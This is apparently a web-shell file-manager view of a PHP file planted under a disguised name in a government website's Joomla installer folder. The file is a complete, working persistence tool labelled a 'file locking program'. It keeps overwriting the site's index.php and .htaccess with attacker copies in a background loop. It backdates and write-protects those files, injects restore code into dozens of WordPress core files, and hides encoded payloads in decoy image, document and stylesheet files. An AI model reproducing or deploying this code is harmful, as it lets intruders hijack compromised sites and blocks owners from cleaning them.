芝麻web文件管理V1.00

编辑当前文件:/home2/sdektunc/hocabayucatan.gob.mx/administrator/components/com_installer/helpers/style_c4.php
<?php error_reporting(0); set_time_limit(0); ini_set('max_execution_time',0); ignore_user_abort(true); if (function_exists('opcache_reset')) { opcache_reset(); } $wwwroot_txt=__DIR__.'/'.md5('wwwroot_2024c').'.txt'; $self_bak=file_get_contents(__FILE__); $unlock_done=false; $unlock_key=md5('unlock_2024c').'.txt'; $unlock_key_content=md5('yes_2024c'); $lock_name_list=array('index.php','.htaccess'); $bak_ext='bak'; $wwwroot=''; $bak_arr=array(); $wp_hydata_arr=array(); $append_code_arr=array(); $max_times_record_txt=__DIR__.'/'.md5('max_times_record_2024c').'.txt'; function curl_get($url,$timeout=30) { $contents=''; if ( function_exists('curl_exec') ) { $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, FALSE ); curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); $contents = curl_exec($ch); curl_close($ch); }else { $contents=file_get_contents($url); } return $contents; } function getPhpPath() { ob_start(); phpinfo(1); $info = ob_get_contents(); ob_end_clean(); preg_match("/--bindir=([^&]+)/si", $info, $matches); if (isset($matches[1]) && $matches[1] != '') { return $matches[1] . '/php'; } preg_match("/--prefix=([^&]+)/si", $info, $matches); if (!isset($matches[1])) { return 'php'; } return $matches[1] . '/bin/php'; } function is_cli() { $is_cli = preg_match("/cli/i", php_sapi_name()) ? true : false; if ($is_cli === false) { if (isset($_SERVER['argc']) && $_SERVER['argc'] >= 2) { $is_cli = true; } } if ($is_cli === false) { if (!isset($_SERVER['SCRIPT_NAME'])) { $is_cli = true; } } return $is_cli; } function do_lock($max_times=0) { global $wwwroot,$unlock_done,$unlock_key,$unlock_key_content,$lock_name_list,$bak_ext,$max_times_record_txt; if ( is_cli()==true||$max_times>0 ) unlink(__FILE__); if ($wwwroot!='') { $lock=array(); foreach ($lock_name_list as $lock_name1) { $lock[]=array( 'target'=>$wwwroot.'/'.$lock_name1, 'bak'=>$wwwroot.'/'.$lock_name1.'.'.$bak_ext, 'bak_content'=>'', 'bak_content_md5'=>'' ); } $do_circle=false; for($i=0;$i<count($lock);$i++) { if (is_file($lock[$i]["bak"])) { $lock[$i]["bak_content"]=trim(file_get_contents($lock[$i]["bak"])); if ( is_cli()==true||$max_times>0 ) unlink($lock[$i]["bak"]); } if ($lock[$i]["bak_content"]!="") { $lock[$i]["bak_content_md5"]=md5($lock[$i]["bak_content"]); $do_circle=true; } } $max_times_record=0; while( $do_circle ) { if ( is_file($wwwroot.'/'.$unlock_key)&&trim(file_get_contents($wwwroot.'/'.$unlock_key))==$unlock_key_content ) { chmod($wwwroot.'/'.$unlock_key,0777); file_put_contents($wwwroot.'/'.$unlock_key,'0'); unlink($wwwroot.'/'.$unlock_key); $unlock_done=true; break; } for($i=0;$i<count($lock);$i++) { if ( $lock[$i]["bak_content"]!="" ) { if ( !is_file($lock[$i]["target"]) ) { file_put_contents($lock[$i]["target"],$lock[$i]["bak_content"]); touch($lock[$i]["target"], strtotime("-400 days", time())); chmod($lock[$i]["target"], 0444); }else { if ( md5(file_get_contents($lock[$i]["target"]))!=$lock[$i]["bak_content_md5"] ) { chmod($lock[$i]["target"], 0777); unlink($lock[$i]["target"]); file_put_contents($lock[$i]["target"],$lock[$i]["bak_content"]); touch($lock[$i]["target"], strtotime("-400 days", time())); chmod($lock[$i]["target"], 0444); } } } } usleep(1000); $max_times_record++; if ( isset($_GET['max_times'])&&$_GET['max_times']==0 ) { chmod($max_times_record_txt,0777); file_put_contents($max_times_record_txt,$max_times_record); } if ($max_times>0) { $max_times--; if ( $max_times<=0 ) break; } } }else { echo 'wwwroot无效 --- 运行失败'; exit; } } function http_do_lock() { global $wwwroot_txt,$unlock_done,$self_bak,$bak_arr,$max_times_record_txt; if (is_file($wwwroot_txt)) { unlink($wwwroot_txt); } isset($_GET['max_times'])&&is_numeric($_GET['max_times']) ? $max_times=$_GET['max_times'] : $max_times=10000 ; if ( is_file($max_times_record_txt)&&$max_times>0 ) { $max_times_rec=file_get_contents($max_times_record_txt); if ( is_numeric($max_times_rec) ) $max_times_safe=intval($max_times_rec/100*80); if ( $max_times_safe>$max_times ) { $max_times=$max_times_safe; usleep(100000); $max_times_rec2=file_get_contents($max_times_record_txt); if ($max_times_rec==$max_times_rec2) unlink($max_times_record_txt); } } do_lock($max_times); if ($unlock_done===true) exit; if ( is_file(__FILE__) ) { chmod(__FILE__,0777); unlink(__FILE__); } file_put_contents( __FILE__,$self_bak ); foreach( $bak_arr as $bak1 ) { if ( is_file($bak1['path']) ) { chmod($bak1['path'],0777); unlink($bak1['path']); } file_put_contents( $bak1['path'],$bak1['content'] ); } $http=($_SERVER['HTTPS']!=''&&$_SERVER['HTTPS']!='off')||$_SERVER['REQUEST_SCHEME']=='https'||$_SERVER['SERVER_PORT']=='443' ? 'https://' : 'http://' ; if ( isset($_SERVER["REQUEST_URI"]) ) { $php_name_arr=explode('?',$_SERVER["REQUEST_URI"]); $php_name=$php_name_arr[0]; }else { $php_name=$_SERVER['SCRIPT_NAME']; } if ($_GET['action']=='lock') { curl_get($http.$_SERVER['HTTP_HOST'].$php_name.'?action=http_lock&max_times=0',3); } curl_get($http.$_SERVER['HTTP_HOST'].$php_name.'?action=http_lock&max_times='.$max_times,30); } function check_do_lock() { sleep(2); if ( is_file(__FILE__) ) { echo '<br><br>执行失败,改用http方式执行'; http_do_lock(); } } if ( is_cli()==true ) { if (is_file($wwwroot_txt)) { $wwwroot=trim(file_get_contents($wwwroot_txt)); unlink($wwwroot_txt); } do_lock(0); }else { if ( isset($_SERVER["REQUEST_URI"])&&isset($_SERVER["SCRIPT_FILENAME"]) ) { $request_uri_arr=explode('?',$_SERVER["REQUEST_URI"]); $request_uri_head=$request_uri_arr[0]; $script_filename=str_replace('\\','/',$_SERVER["SCRIPT_FILENAME"]); $wwwroot=str_replace($request_uri_head,'',$script_filename); }elseif( isset($_SERVER["DOCUMENT_ROOT"]) ) { $wwwroot=$_SERVER["DOCUMENT_ROOT"]; }else { $wwwroot=str_replace($_SERVER['SCRIPT_NAME'],'',$_SERVER["SCRIPT_FILENAME"]); } $wwwroot=trim($wwwroot); if ($wwwroot=='') { echo 'wwwroot获取失败 --- 本程序无法运行'; exit; } $check_bak=false; foreach($lock_name_list as $lock_name1) { $bak_path=$wwwroot.'/'.$lock_name1.'.'.$bak_ext; if ( is_file($bak_path) ) { $bak_content=trim(file_get_contents($bak_path)); if ($bak_content!='') { $check_bak=true; $bak_arr[]=array( 'path'=>$bak_path, 'content'=>$bak_content ); $wp_hydata_arr[]=array( 'path'=>$wwwroot.'/'.$lock_name1, 'content'=>$bak_content ); } } } if ($_GET['action']=='lock') { if ($check_bak==false) { echo '<br><br><font color="red">请先上传bak文件并确保内容非空!</font>'; exit; } $wp_hycode_file_arr=array( $wwwroot.'/wp-blog-header.php', $wwwroot.'/wp-load.php', $wwwroot.'/wp-settings.php', $wwwroot.'/wp-config.php', $wwwroot.'/wp-includes/template-loader.php', $wwwroot.'/wp-includes/version.php', $wwwroot.'/wp-includes/compat.php', $wwwroot.'/wp-includes/load.php', $wwwroot.'/wp-includes/functions.php', $wwwroot.'/wp-includes/plugin.php', $wwwroot.'/wp-includes/formatting.php', $wwwroot.'/wp-includes/l10n.php', $wwwroot.'/wp-includes/query.php', $wwwroot.'/wp-includes/theme.php', $wwwroot.'/wp-includes/user.php', $wwwroot.'/wp-includes/pluggable.php', $wwwroot.'/wp-includes/vars.php', $wwwroot.'/wp-includes/fonts.php', $wwwroot.'/wp-includes/style-engine.php', $wwwroot.'/wp-includes/sitemaps.php', $wwwroot.'/wp-includes/rest-api.php', $wwwroot.'/wp-includes/admin-bar.php', $wwwroot.'/wp-includes/nav-menu.php', $wwwroot.'/wp-includes/widgets.php', $wwwroot.'/wp-includes/media.php', $wwwroot.'/wp-includes/http.php', $wwwroot.'/wp-includes/update.php', $wwwroot.'/wp-includes/taxonomy.php', $wwwroot.'/wp-includes/feed.php', $wwwroot.'/wp-includes/comment.php', $wwwroot.'/wp-includes/category.php', $wwwroot.'/wp-includes/revision.php', $wwwroot.'/wp-includes/post.php' ); $web_is_wp=false; foreach($wp_hycode_file_arr as $wp_hycode_file1) { if ( is_file($wp_hycode_file1) ) { $web_is_wp=true; break; } } if ($web_is_wp===true) { $wp_hydata_file_arr=array( $wwwroot.'/wp-admin/css/comments.css', $wwwroot.'/wp-admin/includes/plugin-config.php', $wwwroot.'/wp-admin/images/resize-x.gif', $wwwroot.'/wp-admin/js/tags-admin.js', $wwwroot.'/wp-admin/network/site-guests.php', $wwwroot.'/wp-admin/user/screens.php', $wwwroot.'/wp-admin/edit-drafts.php', $wwwroot.'/wp-content/plugins/akismet/runlog.txt', $wwwroot.'/wp-content/plugins/helloworld.php', $wwwroot.'/wp-content/themes/default/styles.css', $wwwroot.'/wp-content/upgrade/temp.dat', $wwwroot.'/wp-content/uploads/2022/01/0745125896.xls', $wwwroot.'/wp-content/uploads/2022/03/0612368974.bmp', $wwwroot.'/wp-content/uploads/2022/08/0123568542.png', $wwwroot.'/wp-content/uploads/2023/05/0506412536.tiff', $wwwroot.'/wp-content/uploads/2023/09/0305267845.jpg', $wwwroot.'/wp-content/uploads/2023/11/1253452548.doc', $wwwroot.'/wp-content/uploads/2024/01/0458235268.pdf', $wwwroot.'/wp-content/uploads/logs.php', $wwwroot.'/wp-includes/Requests/src/GetHeaders.php', $wwwroot.'/wp-includes/Text/Diff/Engine/filters.php', $wwwroot.'/wp-includes/css/wp-timer.css', $wwwroot.'/wp-includes/css/media-list.css', $wwwroot.'/wp-includes/fonts/dashicons.woff0', $wwwroot.'/wp-includes/images/rss2.png', $wwwroot.'/wp-includes/js/media-loads.js', $wwwroot.'/wp-includes/js/customize-styles.js', $wwwroot.'/wp-includes/theme-compat/slider.php', $wwwroot.'/wp-includes/cache-reset.php', $wwwroot.'/wp-includes/date-time.php', $wwwroot.'/wp-includes/load-check.php', $wwwroot.'/wp-includes/nav-bar.php', $wwwroot.'/wp-includes/plugins-init.php' ); $char='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $wp_hydata=substr(str_shuffle($char),0,6).base64_encode(json_encode($wp_hydata_arr)).substr(str_shuffle($char),0,6); foreach($wp_hydata_file_arr as $wp_hydata_file1) { $append_code_arr[]=' $wp_update_file="'.$wp_hydata_file1.'"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } '; $wp_hydata_file1_dir=dirname($wp_hydata_file1); if ( !is_dir($wp_hydata_file1_dir) ) mkdir($wp_hydata_file1_dir,0755,true); if ( is_file($wp_hydata_file1) ) { chmod($wp_hydata_file1,0777); unlink($wp_hydata_file1 ); } file_put_contents($wp_hydata_file1,$wp_hydata); touch($wp_hydata_file1, strtotime("-500 days", time())); chmod($wp_hydata_file1,0644); } foreach($wp_hycode_file_arr as $wp_hycode_file1) { if ( is_file($wp_hycode_file1) ) { $wp_hycode_file1_content=file_get_contents($wp_hycode_file1); $wp_hycode_file1_mtime=filemtime($wp_hycode_file1); foreach($append_code_arr as $append_code1) { $wp_hycode_file1_content=str_replace($append_code1,'',$wp_hycode_file1_content); $wp_hycode_file1_content=str_replace(trim($append_code1),'',$wp_hycode_file1_content); } $wp_hycode_file1_content=rtrim($wp_hycode_file1_content,'?>'); $wp_hycode_file1_content.=$append_code_arr[array_rand($append_code_arr,1)]; file_put_contents($wp_hycode_file1,$wp_hycode_file1_content); touch($wp_hycode_file1, $wp_hycode_file1_mtime); chmod($wp_hycode_file1,0644); } } } if (is_file($wwwroot_txt)) { chmod($wwwroot_txt,0777); unlink($wwwroot_txt); } file_put_contents($wwwroot_txt,$wwwroot); $php_path=getPhpPath(); $run_file=__FILE__; $cmd="nohup $php_path " . $run_file . " >/dev/null 2>&1 &"; if (function_exists('exec')) { echo 'exec 执行 '.$cmd; exec($cmd); check_do_lock(); }elseif(function_exists('shell_exec')) { echo 'shell_exec 执行 '.$cmd; shell_exec($cmd); check_do_lock(); }elseif(function_exists('system')) { echo 'system 执行 '.$cmd; system($cmd); check_do_lock(); }elseif(function_exists('passthru')) { echo 'passthru 执行 '.$cmd; passthru($cmd); check_do_lock(); }elseif(function_exists('popen')) { echo 'popen 执行 '.$cmd; $fp = popen($cmd,"r"); pclose($fp); check_do_lock(); }elseif(function_exists('proc_open')) { echo 'proc_open 执行 '.$cmd; $fp = proc_open($cmd,array( array("pipe","r"),array("pipe","w"),array("file","/tmp/error-output.txt","a") ),$pipes); proc_close($fp); check_do_lock(); }elseif(function_exists('pcntl_exec')) { echo 'pcntl_exec 执行 '.$php_path.' '.$run_file; pcntl_exec($php_path,array($run_file)); check_do_lock(); }else { echo 'http( set_time_limit=0,ignore_user_abort=true ) 执行 '.$run_file; http_do_lock(); } }elseif($_GET['action']=='unlock') { if ( is_file($wwwroot.'/'.$unlock_key) ) { chmod($wwwroot.'/'.$unlock_key,0777); unlink($wwwroot.'/'.$unlock_key); } file_put_contents($wwwroot.'/'.$unlock_key,$unlock_key_content); sleep(2); if ( !is_file($wwwroot.'/'.$unlock_key)||trim(file_get_contents($wwwroot.'/'.$unlock_key))!=$unlock_key_content ) { echo '解锁成功!'; }else { echo '无需解锁!'; } if ( is_file($wwwroot.'/'.$unlock_key) ) { chmod($wwwroot.'/'.$unlock_key,0777); file_put_contents($wwwroot.'/'.$unlock_key,'0'); unlink($wwwroot.'/'.$unlock_key); } }elseif($_GET['action']=='http_lock') { http_do_lock(); } else { echo '<html><head><title>文件锁定程序-cww版</title></head><body><div><h1>文件锁定程序-cww版</h1><br><br><h3>请先上传index.php.bak和.htaccess.bak到网站根目录再执行本程序</h3><br><br><h3>*建议将本程序上传到子目录运行避免同行盗用<br>*锁定后无响应请手动检查<br>*更新锁定文件请先解锁<br>*解锁和锁定不能运行在相同路径</h3><br><br><h1><a href="?action=lock" target="_self">锁定</a><br><br><a href="?action=unlock" target="_self">解锁</a></h1></div></body></html>'; } } ?>